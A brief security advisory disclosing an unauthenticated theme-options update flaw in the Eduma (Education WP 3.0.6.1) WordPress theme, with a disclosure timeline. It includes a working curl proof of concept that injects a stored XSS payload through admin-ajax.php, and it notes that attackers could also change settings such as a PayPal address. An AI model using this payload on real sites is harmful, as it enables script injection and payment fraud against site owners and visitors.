Education WP 3.0.6.1 aka Eduma suffers from a somewhat common issue: exposed theme options endpoint.

Avada basically had the same type of issue, and most of WordPress Theme and Plugin related issues boils down to an option or setting.

The POC is pretty simple, it updates one of the theme options called thim_google_analytics.

Of course, when all of the options or settings are exposed there are other things that can be done, like changing a PayPal address etc, so it is pretty dangerous.

Stored XSS POC

curl -D- 'http://127.0.0.1/wp-admin/admin-ajax.php' --data "action=thim_update_theme_mods&thim_key=thim_google_analytics&thim_value=XXXX</script><script>alert(1337)</script><scrtipt>"  

Timeline

23 - 04 - 2017 - Vulnerability discovered  
23 - 04 - 2017 - Vendor notified  
27 - 04 - 2017 - Vendor fixed the issues in  3.0.7  
08 - 05 - 2017 - Vulnerability goes public.